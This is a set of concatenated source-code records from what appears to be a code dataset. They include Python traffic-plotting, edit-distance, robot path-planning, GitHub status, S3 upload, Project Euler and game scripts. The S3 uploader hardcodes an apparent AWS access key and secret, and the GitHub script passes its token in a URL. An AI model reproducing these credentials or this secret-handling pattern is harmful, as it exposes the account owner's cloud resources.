volumen_sumo.append(eval(\"v\" + VOLUMEN + \"_v2.d\" + str(i) + \"_erzeugung_\" + str(LINK)))\n volumen_sumo = [take(x, 1) for x in volumen_sumo]\n # print(str(LINK), \"(visum)\", volumen_visum[-1])\n # print(str(LINK), \"(sumo)\", volumen_sumo)\n plt.figure()\n plt.plot(range(1, len(volumen_visum[-1]) + 1), volumen_visum[-1], label=\"Berechnete Auslastung Visum\")\n plt.plot([], label=\"Geplante Fahrzeuge\")\n plt.boxplot(changeFormat(volumen_sumo))\n plt.title(\"Link \" + str(LINK) + \" und Volumen \" + VOLUMEN)\n plt.xlabel(\"Zeit [h]\")\n plt.ylabel(\"# Fahrzeuge\")\n plt.legend(loc=\"upper left\")\n\n\n# relevant = [-68, -67, -35, -15, 15, 35, 67, 68] # Links in Sumo\ndef 
plotRoutenplanung(VOLUMEN, VERSION, relevant, startDurchgang, endDurchgang, timeintervall):\n volumen_visum = []\n for LINK in relevant:\n link = \"m\" + str(LINK)[1:] if LINK < 0 else LINK\n volumen_visum.append(take(eval(\"v\" + VOLUMEN + \"_v\" + VERSION + \".visum_\" + str(link)), 1))\n # print(str(LINK), \"(visum)\", volumen_visum[-1])\n\n durchgaenge = []\n for i in range(startDurchgang, endDurchgang):\n converted = convertTime(eval(\"v\" + VOLUMEN + \"_v\" + VERSION + \".sumo_d\" + str(i) + \"_routing\"))\n counted = countForEachTimeStep(converted, timeintervall)\n onlyRelevant = removeIrrelevantLinks(counted, relevant)\n links = []\n for j in range(len(relevant)):\n zeitschritte = []\n for k in range(len(onlyRelevant)):\n for e in onlyRelevant[k]:\n if e[0] == relevant[j]:\n zeitschritte.append(e[1])\n break\n if len(zeitschritte) - 1 < k:\n zeitschritte.append(0)\n links.append(zeitschritte)\n durchgaenge.append(links)\n for i in range(len(relevant)):\n oneLink = take(durchgaenge, i)\n # print(str(relevant[i]), \"(sumo)\", oneLink)\n plt.figure()\n plt.plot(range(1, len(volumen_visum[i]) + 1), volumen_visum[i], label=\"Berechnete Auslastung Visum\")\n plt.plot([], label=\"Geplante Fahrzeuge\")\n plt.boxplot(changeFormat(oneLink))\n plt.title(\"Link \" + str(relevant[i]) + \" und Volumen \" + VOLUMEN)\n plt.xlabel(\"Zeit [h]\")\n plt.ylabel(\"# Fahrzeuge\")\n plt.legend(loc=\"upper left\")\n\n\n# relevant = [2,3,-5,(6,7,-8),9] # Links in Sumo\ndef plotRoutenplanung2(alt, relevant, startDurchgang, endDurchgang, timeintervall):\n volumen_visum = []\n for LINK in relevant:\n link = \"m\" + str(LINK)[1:] if LINK < 0 else LINK\n volumen_visum.append(take(eval(\"s100\" + alt + \".visum_\" + str(link)), 1))\n # print(str(LINK), \"(visum)\", volumen_visum[-1])\n\n durchgaenge = []\n for i in range(startDurchgang, endDurchgang):\n converted = convertTime(eval(\"s100\" + alt + \".sumo_d\" + str(i) + \"_routing\"))\n counted = countForEachTimeStep(converted, timeintervall)\n onlyRelevant = removeIrrelevantLinks(counted, relevant)\n links = []\n for j in range(len(relevant)):\n zeitschritte = []\n for k in range(len(onlyRelevant)):\n for e in onlyRelevant[k]:\n if e[0] == relevant[j]:\n zeitschritte.append(e[1])\n break\n if len(zeitschritte) - 1 < k:\n zeitschritte.append(0)\n links.append(zeitschritte)\n durchgaenge.append(links)\n for i in range(len(relevant)):\n oneLink = take(durchgaenge, i)\n # print(str(relevant[i]), \"(sumo)\", oneLink)\n plt.figure()\n # plt.plot(range(1, len(volumen_visum[i]) + 1), volumen_visum[i], label=\"Berechnete Auslastung Visum\")\n # plt.plot([], label=\"Geplante Fahrzeuge\")\n plt.boxplot(changeFormat(oneLink))\n plt.title(\"Link \" + str(relevant[i]) + \" und Volumen 100\")\n plt.xlabel(\"Zeit [h]\")\n plt.ylabel(\"# Fahrzeuge\")\n # plt.legend(loc=\"upper left\")\n\n\ndef plotThreshhold(threshhold, startDurchgang, endDurchgang):\n newCalc = []\n for i in range(startDurchgang, endDurchgang):\n newCalc.append(eval(\"t.t\"+threshhold+\"_d\"+str(i)))\n plt.figure()\n for i in range(len(newCalc)):\n plt.plot(newCalc[i])\n plt.yticks([0, 1], [\"nein\", \"ja\"])\n plt.title(\"Neue Umlegungen bei Threshhold \"+str(threshhold))\n plt.xlabel(\"Zeit [h]\")\n plt.ylabel(\"Neue Umlegung\")\n plt.legend(loc=\"upper left\")\n\n\nif __name__ == \"__main__\":\n # plotFahrzeugerzeugung(str(100), [12, 14, 16, 32, 34, 36, 64, 66], 0, 20)\n # plotRoutenplanung(str(300), str(2), [-68, -67, -35, -15, 15, 35, 67, 68], 0, 20, 15)\n # plotRoutenplanung2(\"ohne\", [2, 3, -5, 9], 0, 
20, 15)\n # plotRoutenplanung2(\"mit\", [2, 3, -5, 6, 7, -8, 9], 0, 20, 15)\n # plotThreshhold(str(10), 0, 20)\n plt.show()\n","sub_path":"PythonProject/Auswertung.py","file_name":"Auswertung.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"583516600","text":"\"\"\"Given two words word1 and word2, find the minimum number of operations required to convert\nword1 to word2.\n\nYou have the following 3 operations permitted on a word:\n\nInsert a character\nDelete a character\nReplace a character\nExample 1:\n\nInput: word1 = \"horse\", word2 = \"ros\"\nOutput: 3\nExplanation:\nhorse -> rorse (replace 'h' with 'r')\nrorse -> rose (remove 'r')\nrose -> ros (remove 'e')\nExample 2:\n\nInput: word1 = \"intention\", word2 = \"execution\"\nOutput: 5\nExplanation:\nintention -> inention (remove 't')\ninention -> enention (replace 'i' with 'e')\nenention -> exention (replace 'n' with 'x')\nexention -> exection (replace 'n' with 'c')\nexection -> execution (insert 'u')\n\"\"\"\n\n\nclass Solution:\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n if not word1:\n return len(word2)\n\n if not word2:\n return len(word1)\n\n d = [[0] * (len(word2) + 1) for _ in range(len(word1) + 1)]\n\n for i in range(1, len(word1) + 1):\n d[i][0] = i\n\n for i in range(1, len(word2) + 1):\n d[0][i] = i\n\n for i in range(1, len(word1) + 1):\n for j in range(1, len(word2) + 1):\n weight = 1 if word1[i - 1] != word2[j - 1] else 0\n d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + weight)\n\n return d[-1][-1]\n\n\ninps = [\n ('horse', 'ros', 3),\n ('intention', 'execution', 5),\n ('1abcdef1', 'abcdef', 2),\n ('a', 'b', 1),\n]\n\nsol = Solution()\nfor w1, w2, exp in inps:\n print(f\"Finding min distance between {w1} and {w2} and asserting...\")\n ans = sol.minDistance(w1, w2)\n print(f\" Got: {ans}\")\n # assert ans == exp\n","sub_path":"python/leetcode_questions/edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245210159","text":"import random\nimport time\nimport numpy as np\nimport signal\nfrom src.utils.data_objects.high_level_trajectory import HLTrajectory\nfrom src.utils.graph_search_utils.astar_fibheap import AStar\nfrom src.utils.logger import Logger\n\nfrom src.generators.generator_superclass import GeneratorSuperclass\nfrom src.utils.math_utils import MathUtils\nfrom src.utils import project_constants\n\n\nclass HighLevelTrajectoryPlanner(GeneratorSuperclass, AStar):\n\n '''State = (x, y, yaw, (x_prev, y_prev, yaw_prev), (x_2ndprev, y_2ndprev, yaw_2ndprev))\n '''\n\n def __init__(self, height_map, fs_cost_map, xy_yaw0, xy_yawf, rposer=None):\n\n self.start_state = (xy_yaw0[0],xy_yaw0[1],xy_yaw0[2],(None,None,None),(None,None,None))\n self.hl_traj_astar_search = None\n self.xy_yawf = xy_yawf\n self.xy_yaw0 = xy_yaw0\n self.straight_path_yaw_rad = np.arctan2(self.xy_yawf[1]-self.xy_yaw0[1],self.xy_yawf[0]-self.xy_yaw0[0])\n self.fs_cost_map = fs_cost_map\n self.height_map = height_map\n\n self.vis_successor = project_constants.STEPSEQ_VISUALIZE_SUCCESSOR\n self.rposer = rposer\n\n self.directions = [\n [1.0, 1.0, 1.0],\n [1.0, 1.0, 0.0],\n [1.0, 1.0, -1.0],\n [1.0, 0, 1.0],\n [1.0, 0, 0.0],\n [1.0, 0, -1.0],\n [1.0, -1.0, 1.0],\n [1.0, -1.0, 0.0],\n [1.0, -1.0, -1.0],\n [0, 1.0, 1.0],\n [0, 1.0, 
0.0],\n [0, 1.0, -1.0],\n [0, 0, 1.0],\n # [0, 0, 0.0],\n [0, 0, -1.0],\n [0, -1.0, 1.0],\n [0, -1.0, 0.0],\n [0, -1.0, -1.0],\n [-1.0, 1.0, 1.0],\n [-1.0, 1.0, 0.0],\n [-1.0, 1.0, -1.0],\n [-1.0, 0, 1.0],\n [-1.0, 0, 0.0],\n [-1.0, 0, -1.0],\n [-1.0, -1.0, 1.0],\n [-1.0, -1.0, 0.0],\n [-1.0, -1, -1]\n ]\n\n self.end_effector_x = project_constants.BASE_STATE_END_EFF_DX_FROM_TORSO\n self.end_effector_y = project_constants.BASE_STATE_END_EFF_DY_FROM_TORSO\n self.base_theta = np.arctan(self.end_effector_y / self.end_effector_x)\n self.xy_yaw_costs = {}\n self.decimal_round = 5\n GeneratorSuperclass.__init__(self, height_map)\n\n # Astar Search variables\n self.visited_state_nodes = {}\n self.g_weight = None\n self.h_weight = None\n # self.iterations = 0\n self.t_start = -1\n self.save_search_weights()\n self.xy_yaw_path = []\n self.smoothed_path = None\n\n AStar.__init__(self,state=self.start_state)\n\n self.inbounds_error = False\n if self.get_cost(xy_yawf[0], xy_yawf[1], xy_yawf[2]) > 10:\n Logger.log(\"Error: robot xy yaw_f is out of bounds\", color=\"FAIL\", class_id=1, msg_type=1)\n self.inbounds_error = True\n\n def save_search_weights(self, debug=False):\n self.g_weight = project_constants.HLTRAJ_G_WEIGHT\n self.h_weight = project_constants.HLTRAJ_H_WEIGHT\n\n if project_constants.STEPSEQ_VERBOSITY >= 3:\n print(\"g weight:\",Logger.pp_double(self.g_weight),\", h_weight:\",Logger.pp_double(self.h_weight))\n\n def build_trajectory(self, suspend_after=None, save_high_density_xy_yaw_path=True, save_smoothed_path=True):\n '''\n returns runtime, -1 if doesn't complete after suspend_after seconds, -2 if inbounds error\n '''\n\n hl_traj = HLTrajectory()\n hl_traj.xy_yaw0 = self.xy_yaw0[:]\n hl_traj.xy_yawf = self.xy_yawf[:]\n\n if self.inbounds_error:\n Logger.log(\"Error: robot xy yaw_f is out of bounds\", \"FAIL\", class_id=1, msg_type=1)\n return -2\n\n t_start = time.time()\n if project_constants.STEPSEQ_VERBOSITY >= 2:\n print(\"Starting high level trajectory search\")\n\n if suspend_after:\n\n def handler(signum, frame):\n raise Exception(\"End of time\")\n\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(suspend_after)\n\n self.t_start = time.time()\n self.search()\n try:\n self.search()\n except Exception as e:\n if project_constants.STEPSEQ_VERBOSITY >= 1:\n Logger.log(f\"Failed to build a path after {round(suspend_after), 2} seconds\", \"FAIL\")\n return -1\n\n else:\n self.search()\n\n if suspend_after: signal.alarm(0)\n\n path = self.result_path()\n\n if project_constants.STEPSEQ_VERBOSITY >= 2:\n print(\"High level trajectory search finished in:\",time.time() - t_start, \"s\")\n\n state_path = []\n for node in path:\n state_path.append(node.state)\n state_path = state_path[:-1]\n for xy_yaw in state_path:\n self.xy_yaw_path.append([xy_yaw[0], xy_yaw[1], xy_yaw[2]])\n\n if save_smoothed_path:\n self.save_smoothed_path()\n\n if save_high_density_xy_yaw_path:\n self.save_high_density_xy_yaw_path()\n\n # Save results\n hl_traj.xy_yaw_path = self.xy_yaw_path[:]\n hl_traj.higher_density_xy_yaw_path = self.higher_density_xy_yaw_path[:]\n hl_traj.ave_higher_density_xy_yaw_path_distance_change = self.ave_higher_density_xy_yaw_path_distance_change\n hl_traj.ave_smooth_path_distance_change = self.ave_smooth_path_distance_change\n hl_traj.failed = False\n hl_traj.runtime = time.time() - t_start\n\n return hl_traj\n\n def return_trajectory(self):\n hl_traj = HLTrajectory()\n hl_traj.xy_yaw0 = self.xy_yaw0[:]\n hl_traj.xy_yawf = self.xy_yawf[:]\n hl_traj.xy_yaw_path = 
self.xy_yaw_path[:]\n hl_traj.higher_density_xy_yaw_path = self.higher_density_xy_yaw_path[:]\n hl_traj.ave_higher_density_xy_yaw_path_distance_change = self.ave_higher_density_xy_yaw_path_distance_change\n # hl_traj.smoothed_path = self.smoothed_path[:]\n hl_traj.ave_smooth_path_distance_change = self.ave_smooth_path_distance_change\n return hl_traj\n\n def save_high_density_xy_yaw_path(self):\n num_to_add_between_points = project_constants.HLTRAJ_NB_POINTS_BTWN_PATH_NODES\n extended_xy_yaw_path = MathUtils.list_extender(self.xy_yaw_path, num_to_add_between_points)\n self.higher_density_xy_yaw_path = extended_xy_yaw_path\n ave_dist = 0\n for i in range(0, len(extended_xy_yaw_path) - 2):\n xy_yaw1 = extended_xy_yaw_path[i]\n xy_yaw2 = extended_xy_yaw_path[i + 1]\n ave_dist += MathUtils._2d_euclidian_distance(xy_yaw1, xy_yaw2)\n ave_dist /= len(extended_xy_yaw_path)\n self.ave_higher_density_xy_yaw_path_distance_change = ave_dist\n\n def get_higher_density_xy_yaw_path(self):\n return self.higher_density_xy_yaw_path\n\n # --------------------- A* Functions\n def is_goal(self, state, debug=False):\n err_threshold = project_constants.HLTRAJ_GOAL_THRESHOLD\n dist = np.fabs(state[0]-self.xy_yawf[0])+ np.fabs(state[1]-self.xy_yawf[1])\n # if project_constants.STEPSEQ_VERBOSITY >= 3:\n # if dist < 1:\n # print(\"Dist for state:\", Logger.pp_list(state), \" to goal: \", Logger.pp_double(dist))\n return dist < err_threshold\n\n def successors(self, state):\n\n # stance = (x, y, yaw, (x_prev, y_prev, yaw_prev))\n # Aprox 1000 iterations/ 60s\n\n # self.iterations += 1\n successors, successor_costs = [],[]\n for direction in self.directions:\n x_new = self.round(state[0] + direction[0] * project_constants.HLTRAJ_DELTAX * np.cos(self.straight_path_yaw_rad))\n y_new = self.round(state[1] + direction[1] * project_constants.HLTRAJ_DELTAY * np.sin(self.straight_path_yaw_rad))\n yaw_new = self.round(state[2] + direction[2] * project_constants.HLTRAJ_YAW_OFFSET)\n\n # if state[3] is not None:\n # new_state = (x_new, y_new, yaw_new, (state[0], state[1], state[2]), (state[3][0], state[3][1], state[3][2]))\n # else:\n # new_state = (x_new, y_new, yaw_new, (state[0], state[1], state[2]), (None, None, None))\n\n new_state = (x_new, y_new, yaw_new, (state[0], state[1], state[2]))\n\n new_state_cost = self.g_weight * self.get_cost(new_state[0], new_state[1], new_state[2])\n\n successors.append(new_state)\n successor_costs.append(new_state_cost)\n\n # if self.debug:\n # if random.randint(0,1000)> 950:\n # node = self.visited_state_node(state)\n # # self.is_goal(state, debug=True)\n # # print \"\\n\\n current state:\",logger.pp_list(state),\"\\t cost to node (node.g):\",logger.pp_double(node.g),\" node.h weight:\",logger.pp_double(node.h),\" \\t total cost (f):\",logger.pp_double(node.f)\n #\n # # print \" parent state:\",logger.pp_list(parent_state\n # t_elapsed = time.time() - self.t_start\n # print \"\\n current state:\",logger.pp_list(state)\n # print \" iterations:\",self.iterations,\" t_elapsed:\",t_elapsed, \" hweight:\",logger.pp_double(self.h_weight)\n # # print \" path_yaw_est:\",logger.pp_double(path_yaw_est)\n # # print \" dist traveled (out of 1):\",i\n # # print\n # # for i in range(len(successors)):\n # # print \" cost:\",successor_costs[i],\"\\th:\",logger.pp_double(self.heuristic(successors[i])),\"\\tq:\",logger.pp_list(successors[i])\n\n if self.vis_successor:\n if random.randint(0,1000)>950:\n self.rposer.set_xyz_yaw(state[0], state[1], project_constants.TORSO_Z_DESIRED, np.deg2rad(state[2]))\n\n 
if project_constants.STEPSEQ_VERBOSITY >= 3:\n if random.randint(0,1000)> 950:\n node = self.visited_state_node(state)\n # self.is_goal(state, debug=True)\n print(f\"\\t q_xy: {Logger.pp_list(state[0:3])} \\t dist to goal: {round(np.sqrt( (state[0] - self.xy_yawf[0])**2 + (state[1]-self.xy_yawf[1])**2 ), 2)} \\t n.g: {Logger.pp_double(node.g)} \\t n.h: {Logger.pp_double(node.h) }\\tn.f: {Logger.pp_double(node.f)}\")\n\n # print \" parent state:\",logger.pp_list(parent_state\n # print \"\\n\\n current state:\",logger.pp_list(state)\n # print \" path_yaw_est:\",logger.pp_double(path_yaw_est)\n # print \" dist traveled (out of 1):\",i\n # print\n # for i in range(len(successors)): # type: int\n # print \" cost:\",successor_costs[i],\"\\th:\",logger.pp_double(self.heuristic(successors[i])),\"\\tq:\",logger.pp_list(successors[i])\n # time.sleep(2)\n\n return successors,successor_costs\n\n def clear_visited(self):\n self.visited_state_nodes.clear()\n\n def visit(self, state, node):\n self.visited_state_nodes[state] = node\n\n def visited_state_node(self, state):\n if state in self.visited_state_nodes:\n return self.visited_state_nodes[state]\n return None\n\n def heuristic(self, state):\n\n parent_state = state[3]\n # _2nd_parent_state = state[4]\n\n if parent_state == (None, None, None):\n path_yaw_est_deg = state[2] # just sets the yaw heuristic to 0\n else:\n path_yaw_est_deg = np.rad2deg(np.arctan2(state[1] - parent_state[1], state[0] - parent_state[0]))\n\n # total_dist = np.sqrt( (self.xy_yaw0[0] - self.xy_yawf[0])**2 + (self.xy_yaw0[1]-self.xy_yawf[1])**2 )\n xy_dist_to_goal = np.sqrt( (state[0] - self.xy_yawf[0])**2 + (state[1]-self.xy_yawf[1])**2 )\n dist_weight = 1.0\n # yaw_weight = 0.0\n yaw_weight = .001\n #\n # if xy_dist_to_goal / total_dist > .8:\n # yaw_weight = 0\n\n return self.h_weight * (dist_weight*xy_dist_to_goal + yaw_weight*np.abs(state[2]-path_yaw_est_deg))\n # return self.h_weight * (dist_weight*xy_dist_to_goal)\n\n # --------------------- Helper Functions\n \n def save_smoothed_path(self):\n\n if project_constants.STEPSEQ_VERBOSITY >= 3:\n for xy_yaw in self.xy_yaw_path:\n print(\" \",Logger.pp_list(xy_yaw))\n try:\n smoothed_path = MathUtils._3d_pointlist_cubic_interprolation(self.xy_yaw_path)\n except TypeError:\n Logger.log(\"Error: 'm > k must hold'\", \"FAIL\")\n smoothed_path = self.xy_yaw_path\n\n self.smoothed_path = smoothed_path\n ave_dist = 0\n for i in range(0, len(smoothed_path) - 2):\n xy_yaw1 = smoothed_path[i]\n xy_yaw2 = smoothed_path[i + 1]\n ave_dist += MathUtils._2d_euclidian_distance(xy_yaw1, xy_yaw2)\n ave_dist /= len(smoothed_path)\n self.ave_smooth_path_distance_change = ave_dist\n\n def get_cost(self, x, y, yaw, debug=False):\n\n x_margin = project_constants.SEARCH_SPACE_X_MARGIN\n y_margin = project_constants.SEARCH_SPACE_Y_MARGIN\n fl_base, fr_base, br_base, bl_base = self.get_end_affector_xyz_coords_from_xy_yaw_deg_at_base_state([x,y,yaw],debug=debug, with_x_margin=x_margin, with_y_margin=y_margin)\n\n # out of search area\n if not fl_base:\n return np.inf\n\n fl_x, fl_y = fl_base[0], fl_base[1]\n fr_x, fr_y = fr_base[0], fr_base[1]\n bl_x, bl_y = bl_base[0], bl_base[1]\n br_x, br_y = br_base[0], br_base[1]\n\n r = .1\n\n # fl_cost = self.fs_cost_map.cost_at_xy(fl_x, fl_y)\n # fr_cost = self.fs_cost_map.cost_at_xy(fr_x, fr_y)\n # bl_cost = self.fs_cost_map.cost_at_xy(bl_x, bl_y)\n # br_cost = self.fs_cost_map.cost_at_xy(br_x, br_y)\n fl_cost = self.fs_cost_map.min_cost_in_circle_about_xy(fl_x, fl_y, r)\n fr_cost = 
self.fs_cost_map.min_cost_in_circle_about_xy(fr_x, fr_y, r)\n bl_cost = self.fs_cost_map.min_cost_in_circle_about_xy(bl_x, bl_y, r)\n br_cost = self.fs_cost_map.min_cost_in_circle_about_xy(br_x, br_y, r)\n cost = fl_cost + fr_cost + bl_cost + br_cost\n\n return cost\n\n def dist_between_xy_yaws(self, q1, q2, yaw_err_coeff=None):\n x_scaler = 1\n y_scaler = 1\n yaw_scaler = 1.0/25.0\n if yaw_err_coeff:\n yaw_scaler *= yaw_err_coeff\n return np.sqrt( x_scaler*(q1[0] - q2[0])**2 + y_scaler*(q1[1] - q2[1])**2 + yaw_scaler*(q1[2] - q2[2])**2 )\n\n def round(self,n):\n return np.round(n,decimals=self.decimal_round)","sub_path":"src/generators/high_level_trajectory_generator.py","file_name":"high_level_trajectory_generator.py","file_ext":"py","file_size_in_byte":14498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"477640662","text":"#!/usr/bin/python\nimport requests\nimport os\nimport json\nimport argparse\n\n\ndef post_github_commit_status(commit_sha, state, repo, user, token,\n target_url):\n build_number = os.environ.get('CIRCLE_BUILD_NUMBER')\n if build_number:\n target_url += \"/{}\".format(build_number)\n data = {\"state\": state,\n \"context\": \"paperg/integration\",\n \"description\": \"paperg/integration: \" + state,\n \"target_url\": target_url}\n data_json = json.dumps(data)\n headers = {'Content-Type': 'application/json'}\n url = \"https://api.github.com/repos/{}/{}/statuses/{}?access_token={}\".format(\n user, repo, commit_sha, token)\n\n response = requests.post(url, data=data_json, headers=headers)\n print(\"Posting commit status={} for {}/{}/{} got response:\\n{}\".format(\n state, user, repo, commit_sha, response.content))\n return response\n\n\ndef __parse_args():\n argparser = argparse.ArgumentParser()\n\n argparser.add_argument('-s', '--state', required=True, default=None,\n help='State: [success | failure | pending ]')\n argparser.add_argument('-t', '--target-url',\n default=os.environ.get('CINDERBLOCK_TARGET_URL'),\n help='target_url for the commit status')\n argparser.add_argument('-u', '--user',\n default=os.environ.get('CINDERBLOCK_GITHUB_USER'),\n help='The GitHub user to send commitstatus to')\n argparser.add_argument('-T', '--token',\n default=os.environ.get('CINDERBLOCK_GITHUB_TOKEN'),\n help='GitHub API token')\n argparser.add_argument('-c', '--commit', default=os.environ.get('CINDERBLOCK_SHA'),\n help='The git commit SHA to post status to')\n argparser.add_argument('-r', '--repo',\n default=os.environ.get('CINDERBLOCK_PROJECT_NAME'),\n help='The GitHub repo')\n args = argparser.parse_args()\n assert args.target_url, \"target-url missing or CINDERBLOCK_TARGET_URL is not set!\"\n assert args.token, \"github token missing or CINDERBLOCK_GITHUB_TOKEN is not set!\"\n assert args.user, \"github user missing or CINDERBLOCK_GITHUB_USER is not set!\"\n assert args.commit, \"commit missing or CINDERBLOCK_SHA is not set!\"\n assert args.repo, \"repo missing or CINDERBLOCK_PROJECT_NAME is not set!\"\n return args\n\n\nif __name__ == '__main__':\n args = __parse_args()\n post_github_commit_status(commit_sha=args.commit, state=args.state,\n repo=args.repo, user=args.user, token=args.token,\n target_url=args.target_url)\n","sub_path":"cinderblock/commitstatus.py","file_name":"commitstatus.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"303475320","text":"import boto3\nimport os\n\nclass Settings:\n def __init__(self):\n 
self.input_path = \"/home/pi/Desktop/picture/\"\n self.stored_names = os.listdir(self.input_path)\n self.my_bucket = \"hyeonghakbucket\"\n self.s3 = boto3.client(\n 's3', # 사용할 서비스 이름, ec2이면 'ec2', s3이면 's3', dynamodb이면 'dynamodb'\n aws_access_key_id=\"AKIA27VRBCJZH7CEXQZM\", # 액세스 ID\n aws_secret_access_key=\"62DOftgv9nJfGE0R93dnT5Yk6NRHAu+f0cw21wqA\") # 비밀 엑세스 키\n\ndef file_upload():\n settings = Settings()\n file = None\n for name in settings.stored_names:\n file = settings.input_path + name\n print(file)\n settings.s3.upload_file(file, settings.my_bucket, name)\n\n","sub_path":"aws/aws_fileupload.py","file_name":"aws_fileupload.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"328491108","text":"from itertools import product\nfrom collections import Counter\n\nA = []\nfor _ in range(9) :\n A.append([i for i in range(1, 5)])\npeter_possibilites = [] \nfor p in product(*A) :\n peter_possibilites.append(sum(p))\nC_peter_possibilites = Counter(peter_possibilites) \n\n\nB = []\nfor _ in range(6) :\n B.append([i for i in range(1, 7)])\ncolin_possibilites = [] \nfor p in product(*B) :\n colin_possibilites.append(sum(p))\n\nC_colin_possibilites = Counter(colin_possibilites)\n\n\npeter_wins = 0\nfor (k_p, v_p) in C_peter_possibilites.items() :\n for (k_c, v_c) in C_colin_possibilites.items() :\n if k_p > k_c :\n peter_wins += v_p * v_c\n \na = 6**6 * 4 **9\n \nprint(format(peter_wins/a, '.7f'))\n\n\n","sub_path":"projectEuler_p205.py","file_name":"projectEuler_p205.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"140318888","text":"#------------------------------\n# Name: Esercizio 3.9\n# Authors: Montali Simone, Riccardo Fava\n#------------------------------\n\nimport game2d\nimport random\nARENA_W=500\nARENA_H=500\n\ndef keydown(code: str):\n global balls\n print(code)\n if (code==\"ArrowLeft\"):\n balls[0].go_left()\n elif (code==\"ArrowRight\"):\n balls[0].go_right()\n if(code==\"Space\"):\n balls[0].jump()\n\n\ndef keyup(code: str):\n global balls\n if (code==\"ArrowLeft\" or code == \"ArrowRight\"):\n balls[0].stay()\n\n\n\n\n\n\nclass Ball:\n\n def __init__(self, x, y, weight) :\n self._x = x\n self._y = y\n self._weight=weight\n self._dx = 0\n self._dy = 0 #Simuliamo un peso pallina da 10 a 40\n self._w = 20\n self._h = 20\n self._g = 0.4\n self._color = (random.randint(0,255),random.randint(0,255),random.randint(0,255))\n\n def move(self):\n self._x += self._dx\n if ((self._x)>(ARENA_W+self._w)):\n self._x=self._w\n if((self._w+self._x)<0):\n self._x=(ARENA_W+self._w)\n self._dy+=self._g\n self._y += self._dy\n if (self._y>=(ARENA_H-self._h)):\n self._y=(ARENA_H-self._h)\n\n def rect(self) -> (int, int, int, int):\n return self._x, self._y, self._w, self._h\n\n def update (self):\n self.move()\n self.draw()\n print(self._dx)\n\n def draw(self):\n game2d.draw_circle(self._color,(self._x,self._y),self._w)\n\n def go_left (self):\n print(\"left\" )\n self._dx=-5\n\n def go_right (self):\n self._dx=5\n\n def stay (self):\n self._dx=0\n\n def jump (self):\n if(self._y==(ARENA_H-self._h)):\n self._dy=-15\n\ndef updateall ():\n game2d.canvas_fill((255, 255, 255))\n for b in balls:\n b.update()\n\ngame2d.canvas_init((ARENA_W,ARENA_H))\nballs=[]\nballs.append(Ball(random.randint(0, 
ARENA_W),random.randint(0,ARENA_H),random.randint(10,40)))\n\ngame2d.handle_keyboard(keydown,keyup)\ngame2d.set_interval(updateall,1000//30)\n","sub_path":"ese3.9.py","file_name":"ese3.9.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"649275328","text":"'''\nCreated on Apr 12, 2012\n\n@package: gateway service\n@copyright: 2011 Sourcefabric o.p.s.\n@license: http://www.gnu.org/licenses/gpl-3.0.txt\n@author: Gabriel Nistor\n\nProvides the gateway repository processor.\n'''\n\nfrom ally.container.ioc import injected\nfrom ally.design.processor.attribute import defines, requires\nfrom ally.design.processor.context import Context\nfrom ally.design.processor.handler import HandlerProcessor\nfrom ally.gateway.http.spec.gateway import IRepository, RepositoryJoined\nfrom ally.http.spec.codes import BAD_GATEWAY, CodedHTTP\nfrom ally.http.spec.server import HTTP_OPTIONS\nfrom ally.support.http.request import RequesterGetJSON\nfrom sched import scheduler\nfrom threading import Thread\nimport logging\nimport re\nimport time\n\n# --------------------------------------------------------------------\n\nlog = logging.getLogger(__name__)\n\n# --------------------------------------------------------------------\n\nclass GatewayRepository(Context):\n '''\n The gateway context based on @see: gateway-http/gateway.http.gateway\n '''\n # ---------------------------------------------------------------- Defined\n filters = defines(dict, doc='''\n @rtype: dictionary{integer: list[string]}\n Contains a dictionary of filter URIs indexed by the represented group. @see: Gateway.Filters.\n ''')\n# host = defines(str, doc='''\n# @rtype: string\n# The host where the request needs to be resolved, if not provided the request will be delegated to the\n# default host.\n# ''')\n# protocol = defines(str, doc='''\n# @rtype: string\n# The protocol to be used in the communication with the server that handles the request, if not provided\n# the request will be delegated using the default protocol.\n# ''')\n navigate = defines(str, doc='''\n @rtype: string\n A pattern like string of forms like '*', 'resources/*' or 'redirect/Model/{1}'. 
The pattern is allowed to\n have place holders and also the '*' which stands for the actual called URI, also parameters are allowed\n for navigate URI, the parameters will be appended to the actual parameters.\n ''')\n putHeaders = defines(dict, doc='''\n @rtype: dictionary{string: string}\n The headers to be put on the forwarded requests.\n ''')\n\nclass MatchRepository(Context):\n '''\n The match context.\n '''\n # ---------------------------------------------------------------- Defined\n gateway = defines(Context, doc='''\n @rtype: Context\n The matched gateway.\n ''')\n groupsURI = defines(tuple, doc='''\n @rtype: tuple(string)\n The match groups for the URI.\n ''')\n\nclass Request(Context):\n '''\n The request context.\n '''\n # ---------------------------------------------------------------- Defined\n repository = defines(IRepository, doc='''\n @rtype: IRepository\n The repository to be used for finding matches.\n ''')\n # ---------------------------------------------------------------- Required\n clientIP = requires(str)\n \nclass Response(CodedHTTP):\n '''\n The response context.\n '''\n # ---------------------------------------------------------------- Defined\n text = defines(str)\n\n# --------------------------------------------------------------------\n\n@injected\nclass GatewayRepositoryHandler(HandlerProcessor):\n '''\n Implementation for a handler that provides the gateway repository by using REST data received from either internal or\n external server. The Gateway structure is defined as in the @see: gateway-http plugin.\n '''\n \n uri = str\n # The URI used in fetching the gateways.\n cleanupInterval = float\n # The number of seconds to perform clean up for cached gateways.\n requesterGetJSON = RequesterGetJSON\n # The requester for getting the 